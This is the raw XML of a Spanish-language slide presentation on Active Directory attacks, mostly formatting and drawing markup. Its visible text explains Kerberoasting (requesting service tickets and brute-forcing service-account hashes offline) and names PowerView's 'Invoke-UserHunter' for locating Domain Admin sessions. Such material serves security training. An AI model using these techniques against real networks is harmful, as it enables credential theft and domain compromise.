          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B5055C5" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1608"/>
        </w:tabs>
        <w:spacing w:line="211" w:lineRule="auto"/>
        <w:ind w:right="1733"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Los </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>ataques</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>conocidos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>como</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Kerberoasting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">se </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>pueden</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> usar para </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>forzar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> las credenciales de las cuentas de servicio.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43F72D73" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C97682B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="116"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57844031" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1715"/>
        </w:tabs>
        <w:spacing w:line="555" w:lineRule="exact"/>
        <w:ind w:left="1715" w:hanging="467"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Necesitamos encontrar usuarios en los que un usuario de dominio con privilegios altos como Domain Admin tenga</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079F7A56" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:spacing w:line="555" w:lineRule="exact"/>
        <w:ind w:left="1608"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>sesiones, esto se puede hacer usando</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:color w:val="EC7C30"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> la consulta "Invoke-UserHunter</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C24E340" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:spacing w:line="555" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="1200" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E2ED5F4" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo7"/>
        <w:spacing w:line="579" w:lineRule="exact"/>
        <w:ind w:left="696"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">-&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Kerberoasting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="65D2EB52" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="71"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="679AA864" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1776"/>
        </w:tabs>
        <w:spacing w:line="506" w:lineRule="exact"/>
        <w:ind w:left="1776" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Enviamos todos los detalles requeridos a DC para obtener un </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>TGT válido</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">, este TGT se puede usar para obtener un </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>TGS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333AEAFB" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:spacing w:line="506" w:lineRule="exact"/>
        <w:ind w:left="1777"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>(para autorización) para acceder a cualquier servicio específico.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7655732D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="473076F0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="165"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="294FBD1D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1777"/>
        </w:tabs>
        <w:spacing w:line="211" w:lineRule="auto"/>
        <w:ind w:right="1517"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Al obtener el TGS (cifrado con el hash de la cuenta de servicio de destino </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>), se puede exportar y luego aplicarlo por fuerza bruta contra un diccionario de contraseñas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7316D8E6" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E8BE7D0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="131"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="684904EE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1776"/>
        </w:tabs>
        <w:spacing w:before="1"/>
        <w:ind w:left="1776" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Además, los administradores generalmente no se centran en cambiar las credenciales de</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544F0DA7" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:spacing w:before="41"/>
        <w:ind w:left="1717"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>cuenta de servicio que no es de máquina</w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">, terminamos obteniendo las credenciales de texto sin cifrar </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t></w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CBAEC9" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BFD3D2B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="210"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D20870B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1776"/>
        </w:tabs>
        <w:ind w:left="1776" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>En resumen, es la fuerza bruta fuera de línea de las credenciales de las cuentas de servicio.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E98478" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="780" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="308BB068"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423104" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="45892DC5" wp14:editId="3AADC080">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1754124</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>18283</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="8684260" cy="6513830"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>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4260" cy="6513830"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="8684260" cy="6513830"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="508" name="Image 508"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId67" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="8683750" cy="6513608"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="509" name="Image 509"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId264" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="2854324" y="191393"/>
                            <a:ext cx="3500247" cy="355346"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="510" name="Graphic 510"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="643381" y="1248540"/>
                            <a:ext cx="5918200" cy="5093335"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="5918200" h="5093335">
                                <a:moveTo>
                                  <a:pt x="636397" y="4626584"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="557530" y="4658715"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="581355" y="4679632"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="512826" y="4757001"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="473837" y="4800016"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="435737" y="4841392"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="398272" y="4880851"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="361950" y="4917884"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="326644" y="4952060"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="292608" y="4983150"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="260096" y="5010594"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="214464" y="5044084"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="214261" y="5044275"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="213893" y="5044478"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="213283" y="5044897"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="200279" y="5053101"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="160921" y="5072507"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="137160" y="5079111"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="136626" y="5079111"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="126365" y="5080228"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="118173" y="5080228"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="108800" y="5078552"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="107835" y="5078387"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="99999" y="5075631"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="99199" y="5075364"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="91401" y="5071110"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="90970" y="5070767"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="83312" y="5064938"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="82550" y="5064087"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="76200" y="5057762"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="75488" y="5056771"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="52070" y="5015573"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="38150" y="4970462"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="37909" y="4969649"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="34061" y="4952060"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="30695" y="4933962"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="28346" y="4919650"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="28105" y="4917884"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="28003" y="4917554"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="27711" y="4915789"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="27787" y="4915586"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="25031" y="4895621"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="20662" y="4853825"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="17373" y="4808601"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="14998" y="4759020"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="13081" y="4682096"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="12700" y="4628794"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="12700" y="4574425"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="13081" y="4519206"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="13716" y="4463580"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1016" y="4463440"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="4574425"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="4628794"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="279" y="4658715"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="381" y="4670095"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1511" y="4733506"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3276" y="4783086"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6032" y="4830280"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="9906" y="4874577"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="15240" y="4917554"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="21844" y="4955705"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="34925" y="5005603"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="52451" y="5045799"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="84328" y="5081689"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="127381" y="5092903"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="139573" y="5091582"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="152146" y="5088763"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="165100" y="5084496"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="175437" y="5080228"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="178155" y="5079111"/>
                                </a:lnTo>
                                <a:lnTo>
